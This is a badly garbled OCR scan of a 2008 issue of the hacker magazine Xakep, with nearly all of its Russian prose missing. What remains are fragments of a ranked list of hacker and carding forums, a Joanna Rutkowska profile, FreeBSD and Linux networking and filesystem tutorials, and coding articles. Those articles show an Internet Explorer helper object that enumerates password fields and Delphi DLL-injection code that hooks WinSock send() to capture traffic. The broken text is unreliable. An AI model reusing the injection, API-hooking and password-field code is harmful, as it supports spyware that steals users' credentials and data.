Keylogger Shield -
. ,
, .
:



- ,
:).

: MouseRobot
: Windows 2000/XP
: AutomationBox
,
( )
(/). ,
MouseRobot
. ,
,
.


. MouseRobot
:


MouseRobot
.
,
,
,
,


,

CD DVD :
,
,
, ,



, ,

. :
30 . ,
:). automationbox.
com/ru/downloads.html, DVD.

: AutomationBox Tools
: Windows 2000/XP
: AutomationBox



AutomationBox Tools.
, , :
abtplay
abtcapture
( )
abtcontrol
abtscrshot
,
MouseRobot .
, , ,
. ,
. , ,
.
AutomationBox Tools . z

075

>>

Johnny Insider
/ magazine@real.xakep.ru /



. .

, .
forum.xakep.ru
() .
: nikitoz, step, forb, gorl, dlinij, , - ,
. .
8 , ,
- .
, - , , .
. , ?
, . , .
-. ,
. .
,

,
.
.

wasm.ru/forum
. .
inattack ... ,
;).
-
.
, , .
,
][ , .
Wasm .
.
. ,
, .
,
- .
15.
( - z0mbie). , ?

076

x 05 /113/ 08

>>
forum.antichat.ru
forum.web-hack.ru
forum.xakep.ru
forum.zloy.org
forum.asechka.ru
xakepy.ru
cardingworld.cc
cracklab.ru
wasm.ru/forum
damagelab.org
forum.inattack.ru
exploit.in
verified.ru
forum.mazafaka.ru
carder.info
hackzona.ru
security-teams.net
hackeveryday.com
reng.ru
kiber-zona.org
dkcs.qwhost.net
rootkits.ru
0

100000

200000

300000

400000

500000

( 2008)

forum.antichat.ru
. , , ,
. , .
(
).
-: vpn, , , , ftp, .. .
.
.
, .
, .
- . - 100
, .

forum.web-hack.ru
-
. , , .
-, . ,
. ,
.
, , ,
.. 4 20,
.
: , , -, ..
, .

x 05 /113/ 08

077

>>
forum.inattack.ru
rootkits , wasm , , , , inattack
. Pinch.
. ,
, . ,
;).
. . , IP
10 .
.
.
,
. - ,
2000. ,
150 .

xakepy.ru
, , -
.
,
.
xakepy.ru
ez!n3. , . , openvpn ;).


& , , - , . .
- ( ), black-
white- $30 .
, vBulletin RSS, .
VIP- .
4.5 .

exploit.in/forum
, , ,
, .
23 , , . .
mpack , ,
.
: ,
, - -, ,
.
. VMware .
, .

, . .

078

x 05 /113/ 08

>>
rootkits.ru
,
.
, - (). , .
,
, . - . ,
, , .
kernel- . ,
.
wasm,
rsdn rootkits.ru.
, - ,
. , , .

cracklab.ru
, , .. .
,
- PE- .
, , .
cracklab , :

, ;

, ;

;

.
. z

x 05 /113/ 08

079

>>
X-Profile

Mifrill
/ mifrill@riddick.ru /

(Joanna
Rutkowska) , . :
. , , , ,
Microsoft Blue Pill?
:
: 27
: Windows
Vista: Blue Pill; , 2006
-5

, . . (Warsaw University of
Technology), . , 5%
. (
11 ) - , . , ,

.
PC AT, 2 ,
40 Hercules.
, , ,
.
, . , , ,
etc.
.

Phrack (http://www.phrack.org/)
.

stack-smashing , (

080

). , , Phrack' .

. . ,
, -
.
. , .
.
, , . ,
,
. ,
.


,
COSEINC.
, , , .
COSEINC Blue Pill,
.
,
Advanced Malware Labs. ,
.
. ,
x 05 /113/ 08

>>

Black Hat 2006

, . -,
, , ,
-. ,
Vista, , , Linux
COSEINC . .
.
. , (
) (hyper-visor) .
Blue pill,
.
, -
Vista. SyScan ( 2006,
), , 3 , Black Hat .
, Microsoft
( , , , , , , ), .
, Blue pill 100% , ,
, , , . x 05 /113/ 08

, (Thomas Ptacek)
, (Nate Lawson)
(Peter Ferrie).
.
, , . , ,
Black Hat 2007.
.
, .
. , . ,
( ) ... ,
$200 (sic!) . , ,
, 8 20
, $384000. .
:
$384000 , ?
.
, ,
, . ,
2006 eWeek ,
,

081

>>

links
bluepillproject.org
Blue pill.
invisiblethingslab.
com ITL.
invisiblethings.org

ITL.
theinvisiblethings.
blogspot.com
.

.
.

.
Microsoft, ,
.
, , ,
100% , -. , ,
,

, ,

. ,
.

, : . ,
,
, , ,
- ,
.
.


2007 COSEINC. ,
,
Blue pill. .
-.
Invisible Things Lab
.
, ITL aka 90210, , .
COSEINC,
Advanced Malware Labs.
ITL .

. ,
Phoenix
Technologies,
. , ,
:
,
.
ITL (
), ,
. , .
- , .

.


, ,
, ,
.
. , .
(
). ,
: ,
. ,
. :).
,
,
. , , , , .

Vista. , , , open source
. ,

open source , , , Vista
. ,
Unix' MAC OS
. ,
, , .
, , -... ,
. ,
-,
IT. z

082

x 05 /113/ 08

>>

ADSL-.

gorl,
20"
.
1 .


Thermaltake
6 ,
4
;).

Asus S200.
5, - eeePC.

,
.


Apple Cinema
23".

C,

Apple. gorl .
.

Apple Mac Pro


Xeon 3 .

084

x 05 /113/ 08

>>

magazine@real.xakep.ru
( )
!

(zloy.unhack@gmail.com),
. , , . Unhack
Zloy Team.

, (sim@xakep.ru)
.

(xackich@xakep.ru).
, ?

(0n1x@xakep.ru>)
.

pluto (khooly@rambler.ru) ,
, .

blonx@xakep.ru .

x 05 /113/ 08

085

>> unixoid
turbina
/ v.turbina@gmail.com /

FreeBSD 7.0


FreeBSD,
.
. , , ...
.
FreeBSD
, FreeBSD.
1993 , (Berkeley Software
Distribution, BSD). ,
. BSD
,
( GNU GPL).
,
FreeBSD , , ,
. ,
.
, ,
,
. ,
FreeBSD , Linux.
FreeBSD CURRENT STABLE.
. ,
, , . STABLE,

086

, , .
STABLE
. STABLE
(RELEASE).
, 7.0, CURRENT
STABLE.


, FreeBSD 7.0,
(
).
(people.freebsd.org/~kris/scaling).
3.5 FreeBSD 6.x ~15%
, Linux 2.6.
?
, FreeBSD
.
, giant lock
. , , mplock,
. ,
x 05 /113/ 08

>> unixoid
, .
2000 SMPng (SMP next generation),

, . FreeBSD 5.0,
mplock
,
. ,
.
FreeBSD 5.3
,
,
(, VFS UFS
). , giant lock 7.0 (, NET_NEEDS_GIANT 2007).
FreeBSD ,
. ,
,
.
ULE
.
, ,
, CPU , ,
. ,
CPU, . , 7.0 4BSD sheduler:
% grep SCHED /usr/src/sys/conf/NOTES
options
SCHED_4BSD
#options
SCHED_ULE
, , . ULE
. , 7.1
. ,
SCHED_ULE. ULE
ULE 2.0 SCHED_
SMP (,
).
phkmalloc, 90 , ejmalloc (people.freebsd.org/~jasone/jemalloc),
SMP-.


FreeBSD ZFS (Zettabyte
File System), Sun
Microsystems Solaris. 128 ZFS
.
( LVM).
, , , , .
. , FreeBSD ZFS,
ACL
ZFS. , amd64,
i386 pc98. UDF
ZFS! ZFS
ZFSQuickStartGuide
(wiki.freebsd.org/ZFSQuickStartGuide).
. /boot
( single mode),
ZFS /boot/zfs,
x 05 /113/ 08

, ,
.
ZFS.
7.0 tmpfs,
NetBSD Google
Summer of Code. , .
Linux .
. ,
,
. ,
,
.
tmpfs, :

info


Beastie.
,
,
: Devilette
( daemonbabe,
daemoness)
.

# echo 'tmpfs_load="YES"' >> /boot/loader.conf



options TMPFS. , /tmp:


mount_*.


mount -t!

# mount -t tmpfs tmpfs /tmp



/etc/fstab.
0. fsck tmpfs
( ),
.
GEOM,
FreeBSD 5., GEOM_JOURNAL ( ). GEOM
. UFS ( UFS)
,
, (
fsck) .
gjournal(8).
, ,
.
, .
. ,
gjournal
Soft Updates. . , gjournal
(gmirror,
graid3), . ,
. UFS
gjournal :
# gjournal load


FreeBSD

,
DesktopBSD.

(sysutils/desktopbsdtools).

FreeBSD

18000 .
FreeBSD 8
:
ULE,
bsdlabel, 26 ,

GPT (GUID
partition tables),
,
Dtrace
.

GEOM-:
# gjournal label /dev/da0
newfs tunefs '-J '
:
# newfs -J /dev/da0.journal
# mount -o async /dev/da0.journal /mnt
async mount . 7.0
gjournal ,

087

sysinstall

. options
UFS_GJOURNAL. :
# echo 'geom_journal_load="YES"' >> /boot/loader.conf
,
, , gjournal
, .
gvirstor (wikitest.freebsd.org/gvirstor) GEOM- ,
( overcommit). ,
.
. /dev/
virstor/mydisk, ad5 ad6:

finstall

FreeBSD . , ,
, .
.
unionfs . 7.0
, ,
(people.freebsd.org/~daichi/unionfs) . ,
FreeBSD. , ,
CD-ROM :
# mount -t cd9660 -o ro /dev/acd0 /cdrom
# mount t unionfs -o noatime /var/cdrom /cdrom

# gvirstor label -v mydisk /dev/ad5 /dev/ad6


:
# newfs /dev/virstor/mydisk

/var/cdrom /cdrom
. ,
mount_* (mount_devfs, mount_ext2fs,
mount_linprocfs, mount_procfs, mount_linsysfs ..).
'-t'.


# gvirstor add mydisk ad7
, , remove, gvirstor list,
.
, .
GEOM_MULTIPATH (gmultipath)
, gmultipath. Linux
, XFS, , .
NFS (procfs )
,
.
unionfs

Finstall
Finstall . , sysinstall: LiveCD
. Python
PyGTK , front-end
back-end .
.

7.1 ( , finstall (ia64, pc98 PowerPC),
sysinstall ).

088

, ,
-, , . , sendfile()
TSO
, .
SCTP (Stream Control Transmission Protocol)
, GENERIC .
TSO (TCP/IP Segment Offload) LRO (Large Receive Offload)
TCP- ,
.
, .
TCP . 32 ,
. ,
10 . , 6.3 Open/NetBSD ,

lagg(4):
# ifconfig ed0 up
# ifconfig vr0 up
# ifconfig lagg0 create
# ifconfig lagg0 up laggproto lacp laggport ed0 laggport vr0
# ifconfig lagg0 192.168.1.200 netmask 255.255.255.0
# route add -net 0.0.0.0 192.168.1.1 0.0.0.0
FreeBSD Netgraph: ng_car , ng_deflate ng_pred1 deflate
predictor-1 PPP.
x 05 /113/ 08

>> unixoid

warning
,

,

!
,




.

MySQL

2005 KAME IPSec,


KAME OpenBSD

IPSec .
FAST_IPSEC . KAME , FAST_IPSEC IPv6
.
.
,
802.11 (Wi-Fi WiMax).
wicontrol, ,

ifconfig.
sysctl ,
.
, kern.conftxt , net.inet.
icmp.reply_from_interface ICMP IP, , kern.hostuuid
UUID.
TCP
.
sysctl, net.inet.tcp.
sendbuf_* net.inet.tcp.recvbuf_*:

(aka userland)

( TrustedBSD).
: AMD64, i386, ia64, pc98
PowerPC,
ARM UltraSparc T1, -
FreeBSD Sun
Niagara.
Bittorrent (torrents.freebsd.
org:8080), FTP (ftp://ftp.freebsd.
org/pub/FreeBSD). :
, ,
.
,
sysinstall. , ,
finstall (wiki.freebsd.org/finstall),
. .
Linuxulator, Linux

. Linu 2.6.16.
, (
2.4). ,
sysctl compat.linux.osrelease 2.6.16.
freebsd-update,
,
upgrade ( ).
, Dtrace, , ,
.

, ,
.
: KDE 3.5.8, GNOME 2.20.2, X.Org 7.3, GCC
4.2.1, BIND 9.4.2, Sendmail 8.14.2, OpenSSL 0.9.8e. ,
GCC ,
(Stack-Smashing Protector).
1.0 OpenBSM (Open Source
Basic Security Module), Sun BSM
,

, 7.0 , .


.
FreeBSD . ,
. z

net.inet.tcp.sendbuf_auto=1
net.inet.tcp.recvbuf_auto=1

x 05 /113/ 08

dvd

FreeBSD,

(www.
freebsd.org/doc),


. ,

.

FreeBSD

www.
onlamp.com.


ZFS
WiKi
wiki.freebsd.
org/ZFS.

089

>> unixoid
bober
/ zloy.bobr@gmail.com /

PPP
PPPoE PPTP Linux

C
PPPoE PPTP. , - Windows.
-? , . ,
PPPoE/PPTP,
KUbuntu.
PPPoE
PPPoE (Point-to-Point Protocol over Ethernet) PPP Ethernet .
/ xDSL
,
.
, (, , 2.3).
grep PPP /usr/src/linux/.config
, PPP.
PPPoE PPP
pppd
. PPPoE ,
: ppp, pppoe pppoeconf.
KUbuntu :
$ dpkg -s pppoeconf
Package: pppoeconf
Status: install ok installed
RPM rpm -qa | grep ppp.
Ethernet ADSL ( ). Ethernet
, .
/etc/network/interfaces.
$ sudo mcedit /etc/network/interfaces
# IP- DHCP,
:
iface eth0 inet dhcp

090

# IP :
iface eth1 inet static

address 192.168.0.25

network 192.168.0.0

gateway 192.168.0.1

netmask 255.255.255.0

mtu 1492
/etc/resolv.conf DNS ( ):
$ sudo mcedit /etc/resolv.conf
nameserver 111.33.44.55
nameserver 222.44.55.66
, , PPPoE
. . : /etc/ppp/pap-secrets ( chap-secrets,
CHAP ; *-secrets
) /etc/ppp/peers/dsl-provider. pon .
(K)Ubuntu pppoeconf.
sudo pppoeconf .
,
. Ethernet , PADI (PPPoE Active Discovery
Initiation), . pppoeconf dsl-provider. , , ,
. x 05 /113/ 08

>> unixoid

hide-password
#lcp-echo-interval 30
#lcp-echo-failure 4
noauth
#
persist
#
1492
mtu 1492
usepeerdns
, , , , , .
, :
pty "/usr/sbin/pppoe -I eth0 -T 80 -m 1452"
pptpconfig

pppoeconf /etc/network/interfaces,
:

/usr/bin/pon. ,
, , ,
/usr/sbin/pppd call $PROVIDER.
pon :
pon [OPTIONS] [provider] [arguments]
provider /etc/ppp/
peers. provider (
$PROVIDER). :
$ pon dsl-provider
, , (,
) .
. sudo, , ( Ubuntu
dip).

PPPoE
/etc/ppp/pap-secrets ( chapsecrets). ,
( pppoeconf):
user *

password

, pppoeconf .
/etc/ppp/peers/dsl-provider.
pppoeconf :

auto dsl-provider

iface dsl-provider inet ppp

provider dsl-provider
# added by pppoeconf
auto eth0

iface eth0 inet manual

pre-up /sbin/ifconfig eth0 up

PPPoE, . .
:
$ ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol

inet addr:157.33.34.178 P-t-P:192.168.101.1
Mask:255.255.255.255

UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1480
Metric:1

RX packets:283 errors:0 dropped:0 overruns:0
frame:0

TX packets:284 errors:0 dropped:0 overruns:0
carrier:0

collisions:0 txqueuelen:3

RX bytes:3004 (2.9 KiB) TX bytes:2744 (2.6 KiB)
/var/log/
messages.
:
$ tail f /var/log/messages

$ sudo mcedit /etc/ppp/peers/dsl-provider


noipdefault
#
defaultroute
replacedefaultroute
x 05 /113/ 08

, ,
. , route -n, ,
. , default, ppp0. , route add default
ppp0 : ?

091

>> unixoid

tkpppoe RP-PPPOE


,
, PAP (, PPPoE
, VPN ). ,
PPP, , . ,
(, ). ,
papsecrets . .
/etc/ppp/pap-secrets '*'
. :
user server1 password1
user server2 password2
, dsl-provider.
name remotename
.
name user
remotename server1
pon.
. , man HOWTO,

MTU MSS
MTU (Maximum Transmit Unit)
. ,
, ,
.
,
, , . . Ethernet 1518 , 14
4 ( 1500 ).
PPPoE 6 , PPP 2. MTU
PPPoE 1492.
TCP
Maximum Segment Size (MSS), TCP .
, MTU TCP IP (40). , MSS
Ethernet 1460, PPPoE 1452.

092

pppoeconf

options file.
, PPTP.

rp-pppoe
Mandriva, VectorLinux PPPoE
RP-PPPoE.
Ubuntu , . , .
www.roaringpenguin.
com/products/pppoe. tar.gz-,
: ./go-gui ./go,
. : , ,
, DNS, , .
: NONE (),
STANDALONE (, ) MASQUERADE (
).
:
** Summary of what you entered **
Ethernet Interface: eth1
User name: user
Activate-on-demand: No
Primary DNS: 111.33.44.55
Secondary DNS: 222.44.55.66
Firewalling: STANDALONE
, , .
: pppoe-relay, pppoe-setup,
pppoe-start, pppoe-stop, pppoe-connect, pppoe-server, pppoesniff, pppoe-status, pppoe-wrapper tkpppoe. ,
3.6 adsl-,
. HOWTO
.
, pppoestart; pppoe-stop;
pppoe-status.
pppoe-setup. tkpppoe.

PPTP
VPN PPTP (Point-to-Point Tunneling
Protocol) PPPoE. , -
MPPE, Linux PPTP,
.
, 2.6.13.
x 05 /113/ 08

>> unixoid

info
Linux 2.6.15
PPP MPPE

PPTP .

2.6.14, 2.6.15 PPP MPPE.


, , ,
GUI. ,
pptp, :
$ sudo apt-cache search pptp
pptp-linux Point-to-Point Tunneling Protocol
(PPTP) Client
knet The Knet is a frontend to pppd.
kvpnc vpn clients frontend for KDE
network-manager-pptp network management
framework (PPTP plugin)

refuse-eap
#refuse-chap
refuse-mschap
persist
#
maxfail 10
defaultroute
replacedefaultroute
/etc/ppp/chap-secrets :
user pptp password *

PPTP Client
(pptpclient.sourceforge.net).
Linux, *BSD. ,
PPTP: Windows VPN, Linux PopTop,
Cisco PIX .
, , .
$ sudo apt-get install pptp-linux
kernelpatch-mppe. ,
, .
, .
, , Canonical.
PPTP CD-
( ). PPTP
, .
, , sudo
apt-cdrom add. CD <Enter>.

:
$ sudo mcedit /etc/ppp/options.pptp
lock noauth nobsdcomp nodeflate
#
refuse-pap
x 05 /113/ 08

, :
domain\\user pptp password *
, ,
PPPoE:
$ sudo mcedit /etc/ppp/peers/pptp
# PPTP
pty "pptp 10.100.0.1 --nolaunchpppd"
connect /bin/true
name user
# chap-secrets
remotename pptp
#
file /etc/ppp/options.pptp
#require-mppe-128
require-mppe-40
ipparam pptp
. :
$ pon pptp
ifconfig. , ,
. PPTP , PPPoE.
:


Mandriva
PPPoE
PPTP
Mandriva
Linux,



(LAN, ISDN, ADSL).
/etc/ppp


.
Ubuntu


dip.
GNU/
Linux
PPPoE VPN


KUbuntu. ,
,


.
PPPoE
OpenBSD


, ][
#087.

093

>> unixoid

KVpnc VPN

PPPoE PPTP Mandriva

$ pon pptp debug dump logfd 2 nodetach


, .
, /etc/network/interfaces:

.
, Routing DNS ,
VPN .
PPTP Client pptpconfig . Ubuntu .
, /etc/apt/sources.list:
deb http://quozl.netrek.org/pptp/pptpconfig
./

dvd
$ sudo mcedit /etc/network/interfaces
auto tunnel
PPPoE
iface tunnel inet ppp
RFC 2516.

provider pptp
,
WiKi

ru.wikipedia.
org/wiki/PPPoE.

? .
Mandriva PPPoE PPTP Mandriva Linux, (LAN, ISDN, ADSL). ,
PPTP DSL PPPoE,
VPN, .
KUbuntu :
$ sudo apt-get install network-manager-pptp
kvpnc
KNetworkManager. ,
, ,
, , , . VPN, NetworkManager:
$ sudo /etc/dbus-1/event.d/25NetworkManager
restart
* Restarting network connection manager
NetworkManager [ OK ]
$ sudo /etc/dbus-1/event.d/26NetworkManagerDi
spatcher restart
* Restarting network events dispatcher
NetworkManagerDispatcher [ OK ]
. Configure
.
( peers),
IP- . Authentication

094

, :
$ sudo apt-get update
$ sudo apt-get install pptpconfig
$ sudo pptpconfig
,
. Server , ,
. Routing,
, ,
.
DNS ,
DNS.
Encryption (Require) . , , Miscellaneous

,
pppd pptp.
,
.
Start.
KVpnc (home.gna.org/kvpnc) VPN. Cisco VPN, IPSec, PPTP, OpenVPN, L2TP Vtun.
,
Profile New Profile (Wizard),

. , Select the type of your VPN
VPN ( Microsoft PPTP).

PPTP, . ,
. Network
route options : .
, , PPPoE PPTP . ! z
x 05 /113/ 08

>> unixoid

/ dhsilabs@mail.ru, www.dkws.org.ua /

Linux

, Linux, , ,
. Linux.
. , !

,
Linux, , (). , ,
. , .
. , ,
, , .
, , ( )
CD ISO9660.
,
.
. , Linux
open().
open(), ,
.
1. .
, .
glibc ( GNU C)
. glibc , , (, open(), read(), write(),
close()),
glibc, .

096

VFS .
.
, VFS,
(, open_ext3() , ext3, open_vfat() VFAT).
, VFS
.


1 Linux.
.
ext3. 512 .

.
, . .
1, 2 4 .
:
. , ,
. ,
1.
, ext3,
(. 2).
. 1024 x 05 /113/ 08

>> unixoid

...
}

1024 .
,
.
,
,
,
.
,
(
). ,
. ,
,

. , ,
.
() .
,
.
/usr/src/
linux/include/linux/fs.h:
struct super_block {

struct_head s_list; //

unsigned long s_blocksize;

struct file_system_type *s_type;

struct super_operations *s_op;

struct semaphore s_lock;
x 05 /113/ 08

int s_need_sync_fs;

(block bitmap) ,
,
- . 1 ,
.
, .

: ,
.

(inode), .
. ,
, .

.
,
. , .
, ,
.
?
4 , , , 1, 2
4 . , 256 1024 .
?
(double indirect block). ,
, ,
.
, -
,
, !
, ,
, . *nix ,
,
. ,
, . .
-, , ,
. (
) .
ls l. -,
. -,
.

( , ).
.
2 ( 1 ).
. ... ,
!

,
3.
?
, :

info
VFS


. VFS


.
inode


.
C dentry



inode,
,

,


.



.



.

,
][ #095,



.

097

>> unixoid

.2.

# dd if=/dev/zero of=fs.img bs=1k count=30000


. 1.

,
.
.

,
,

,
(. 4).

dd /dev/zero
fs.img. ,
(ANSI- 48), NULL (ANSI- 0)!
1 (bs=1k),
30000. ,
~30 , NULL.
losetup :
# losetup /dev/loop0 fs.img
/dev/loop0,
( ,
, , ).
/dev/loop0
mke2fs:



,

, .3. ext3

. mount,
umount. :
# mount t _ _

:
struct vfsmount {

struct list_head mnt_hash;

struct vfsmount *mnt_parent;

struct dentry *mnt_mountpoint;

struct dentry *mnt_root;

struct super_block *mnt_sb;

struct list_head mnt_mounts;

struct list_head mnt_child;

atomic_t mnt_count;

int mnt_flags;

char *mnt_devname;

struct list_head mnt_list;
}
mnt_list
. /etc/mtab.

# mke2fs -c /dev/loop0 30000


! /mnt/fs, :
# mkdir /mnt/fs
# mount -t ext2 /dev/loop0 /mnt/fs
/mnt/fs
. .

, .
losetup
'-o loop' mount, :
# mount -o loop -t ext2 fs.img /mnt/fs
, ,
umount:
# umount /mnt/fs
/dev/loop0:
# losetup -d /dev/loop0

Alcohol UltraISO Linux!


. , dd
, CD/DVD-:
# dd if=/dev/cdrom of=~/image.iso


Linux
, . :

098

CD-
image.iso.
x 05 /113/ 08

>> unixoid
- .
free, ,
.
,
.

links

Linux ,
.
mount, '--bind':

. 4.

# mount --bind _ _


.
( /mnt/fs
):
# mount -o loop -t iso9660 ~/image.iso /mnt/fs
/mnt/fs, .
ISO-
loop-. , , .
,

. ,
:
# mkdir /swap
# dd if=/dev/zero of=/swap/sw-file bs=1k
count=262144
# mkswap /swap/sw-file 262144
# swapon /swap/sw-file
256 .
. Linux
,
.
.


(ru.wikipedia.org)

,
.

: ext2, ext3,
reiserfs, fuse, sshfs.

Linux .
, LiveCD , ,
,
,
LiveCD. , :
# chroot _
:
# chroot /mnt/newroot

GRUB:
Windows MBR , Linux?
Linux - ! GRUB LiveCD
:
#
#
#
#
#
#

mkdir -p /old/dev
mount /dev/sdaX /old
mount --bind /dev /old/dev
chroot /old
/sbin/grub-install /dev/sda
reboot


,
Linux.
, , ,
.
, ,
//,
dhsilabs@mail.ru. z

5.
x 05 /113/ 08

6. -

099

>> coding

/ aleksandr-ehkkert@rambler.ru /

BHO.
- , Internet Explorer.
, C# Microsoft Visual Studio
. , .
COM Component Object Model
BHO
, ,
- .
! .
,
.
, (object linking
and embedding). , Microsoft,
OLE. OLE (dynamic data exchange DDE).
OLE 1 , DDE
Windows. , OLE 1, ,
. -, DDE . -, DDE . , DDE
. ,
- .
, , , , DDE.
OLE ,

100

, OLE. OLE
, ,
.
OLE , . , , , , .
, . API; ,
. Windows,
API . ,

. , .
.
(Distributed COM, DCOM)
Windows , .
, , !
. . x 05 /113/ 08

>> coding
,
. , .
. ,
, .


.
, ,
.
BHO?, . , BHO,
, -,
IObjectWithSite Internet
Explorer. Intrenet Explorer
, .

BHO?
, BHO
DLL-, Internet Explorer
( ,
Windows Shell).
, BHO
, IE . BHO
,
. ,
,
. ,
BHO
(). ,
.
BHO
BHO , . Internet Explorer
6 BHO ( ) ,
Internet Explorer 7 . BHO
,
WebBrowser, , HTML (, ).
, ...

BHO
BHO
IObjectWithSite. SetSite,
Internet Explorer
BHO (free).
,
CLSID BHO .
Class Library VS.

SHDocVw MSHTML ( SHDocVw shdocvw.dll, %systemroot%/
system32).
System.Runtime.InteropServices
Microsoft.Win32.
BHO (bugaga)
IObjectWithSite ( ,
GetSite SetSite) (functional),
x 05 /113/ 08

. ,
GetSite SetSite,
OnDocumentComplete.
CDHtmlDialog ( http://msdn2.microsoft.
com). WebBrowser
HTMLDocument.
-.

IE, GUID
IObjectWithSite FC4801A3-2BA9-11CF-A22900AA003D7352.
: HKEY_CLASSES_ROOT\Interface\{FC4801A32BA9-11CF-A229-00AA003D7352} HKEY_LOCAL_
MACHINE\SOFTWARE\Classes\Interface\{FC4801A32BA9-11CF-A229-00AA003D7352}.

IObjectWithSite [ComVisible(true)].
GUID , ,
BHO.
GetSite SetSite.
:
GetSite
public int GetSite(
ref Guid guid,
out IntPtr ppvSite)
{
IntPtr pointer =
Marshal.GetIUnknownForObject(webBrowser);
int face = Marshal.QueryInterface(
pointer, ref guid, out ppvSite);
Marshal.Release(pointer);
return face;
}
GetIUnknownForObject
IUnknown
. CLSID
BHO . DLL

IE BHO .
Visual Studio CLSID
. : BHO Internet
Explorer : HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Browser Helper
Objects.

links
BHO

realcoding.net,
gotdotnet.ru , , MSDN.

dvd

C#

BHO.

info

BHO
COM,
,

COM: www.
podgoretsky.com/
classics.html.

RegAsm

101

>> coding

CLSID

: register BHO
[ComRegisterFunction].
RegAsm.exe /codebase.
!
CLSID. BHO!
:
BHO , , . BHO .

...

WebBrowser,
onBeforNavigate2.
, -,
:
public void OnBeforNavigate2 (ref objectTargetFrameName,
ref object PostData,
ref object Headers,
ref bool Cancel)

GUID

102

{
document = (mshtml.HTMLDocument)webBrowser.Document;
foreach(mshtml.IHTMLInputElement el
in document.getElementsByTagName("input"))
{
if(el.type.ToLower() == "password")
// ...
}
}
! BHO , . , BHO ,
COM-.


, BHO ,
, ,
.
BHO, , ,
. Enjoy! z

shdocvw.dll
x 05 /113/ 08

>> coding

/ vr-online.ru /

Delphi

FAQ :
, ?. Step WinSock hook IP Tools. WinSock hooker , .
, .

, , ,
. API- .
: , ?. PE-
, . ,
. PE
. ,
DLL,
,
Process Explorer. , DLL
Opera.exe.
Process
Explorer DLL WS2_32.dll.
WinSock API .
.
. , ,
, . .
API- .
:
1. . ,
. -

104

. PE- . ,
, ,
, . , .
,
. ,
.
2. . ,
.
-.
,
.
, .
, ,
. .
.

. API
,
.
:
x 05 /113/ 08

>> coding

, DLL

1. .

.
exe-.
InjectExe().

.
, DLL, .
ProcessExplorer, .
2. DLL.
. DLL,
, ,
. ,
.
DLL , . DLL.
,
. ,
, Delphi .

advHookApi,
Ms-Rem. ,
, . ,
. .
, .


, , .
1. .
. advHookAPI :
DLL .
InjectDll(), :
function InjectDll(Process: dword; ModulePath: PChar):
boolean;
, dll, .
true.
DLL. InjectDllEx() DLL
Dll .
(, firewall)
x 05 /113/ 08

function InjectExe(Process: dword;


Data: pointer): boolean;
:
1. (handle) , .
2. .
. InjectThisExe()
,
DLL. ,
.
.
function InjectThread(Process: dword; Thread: pointer;
Info: pointer; InfoLen: dword;
Results: boolean): THandle;
: 1. Process .
2. Thread , . 3. Info . 4. InfoLen .
5. Results ( true,
).
2. Windows API.
:
function HookCode(TargetProc, NewProc: pointer;
var OldProc: pointer): boolean;
.
: 1. TargetProc . 2. NewProc
, . 3.
OldProc , (,
). , DLL
, :
function HookProc(lpModuleName, lpProcName: PChar;
NewProc: pointer; var OldProc: pointer): boolean;

105

>> coding

: 1. (DLL). 2. ;
, . 3. -. 4. .
,
.
AdvApiHook UnhookCode(),
.
3. . API
, , .
. Windows,
NT,
System File Protection .
DisableSFC().
. .
. , , .

DLL

TerminateProceess() . .
, . . AdvApiHook
:
function DebugKillProcess(ProcessId: dword):Boolean;
pid . true.
, . ,
send().
Delphi , .
, DVD-,
AdvApiHook .
, .

SendData('', 10, addr(string(buf)), len);


result:=_pOldSend(s,buf,len,flags);
end;

library project1;
uses Windows, advApiHook, Messages, SysUtils;
type
TSocket=integer;
TSendProcedure=function (s: TSocket; var Buf;
len, flags: Integer): Integer; stdcall;
var
_pOldSend: TSendProcedure;
_hinst, _h:integer;
procedure SendData(data:string; funcType:integer;
Buff:pointer; len:integer);
var
d:TCopyDataStruct;
begin
case funcType of
10:
begin
d.lpData := Buff;
d.cbData := len;
d.dwData := 10;
end;
30:
begin
d.lpData := pchar(data);
d.cbData := length(data);
d.dwData := 30;
end;
end;
SendMessage(_h, WM_COPYDATA, 0, LongInt(@d));
End;
function xSend(s: TSocket; var Buf;
len, flags: Integer): Integer; stdcall;
begin

106

procedure DLLEntryPoint(dwReason: DWord);


begin
case dwReason of
DLL_PROCESS_ATTACH:
begin
SendData(' . ...', 30, nil, 0);
_hinst:=GetModuleHandle(nil);
StopThreads;
HookProc('WS2_32.dll','send',
@xSend,@_pOldSend);
SendData(' !',
30, nil, 0);
RunThreads;
end;
DLL_PROCESS_DETACH:
begin
SendData(' ...', 30, nil, 0);
UnhookCode(@_pOldsend);
end;
end;
end;

begin
_h:=findwindow(nil,'WinSock Sniffer');
if (_h = 0) then
begin
MessageBox(0, '
!', '!', 0);
ExitThread(0);
end;
DllProc := @DLLEntryPoint;
DLLEntryPoint(DLL_PROCESS_ATTACH);
end.

x 05 /113/ 08

>> coding

ListView.
-. .
tlHelp32,
Delphi. GetAllProcess(). .
EnableDebugPrivilige().
,
. ,
.
handle . false,
.
.
API CreateToolHelp32
SnapShot(). ,
. TH32CS_SNAPPROCESS,
,
.
:
TH32CS_SNAPTHREAD ;
TH32CS_SNAPMODULE32 ;
TH32CS_SNAPALL , , .
CreateToolHelp32SnapShot() ,
,
ListView. Process32First()
Process32Next(). :
1. , CreateToolH
elp32SnapShot(). 2. TProcessEntry32, .
Process32First() ,
,
.
Process32Next().
, . GetAllProcess()
OnCreate . , ListView
.

, .
Delphi DLL DLL.

DLLEntryPoint. ,
DLL (/ ).
DLL_PROCESS_ATTACH.
. , ,


, , .
DLL. : .
x 05 /113/ 08

GetAllProcess()
var
_SnapList : THandle;
_ProcEntry : TProcessEntry32;
begin
if NOT (EnableDebugPrivilege()) Then
begin
reLog.SelAttributes.Color := clMaroon;
reLog.Lines.Add('
!');
end;
lvProcessList.Items.Clear;
_ProcEntry.dwSize := SizeOf(TProcessEntry32);
_SnapList := CreateToolHelp32SnapShot(
TH32CS_SNAPPROCESS, 0);
if (Process32First(_SnapList, _ProcEntry)) Then
begin
Repeat
with lvProcessList.Items.Add Do begin
Caption :=IntToStr(_ProcEntry.th32ProcessID);
SubItems.Add(ExtractFileName(
_ProcEntry.szExeFile));
end;
Until not (Process32Next(_SnapList,
_ProcEntry));
end;
CloseHandle(_SnapList);
end;

107

>> coding

( ) .
,
/, .
DLL
SendData().
. , . .
AdvAPIHook StopThreads().
. ,
. HookProc().
:
1. , . send(),
W32_32.dll (
WinSock API).
2. . send. ,
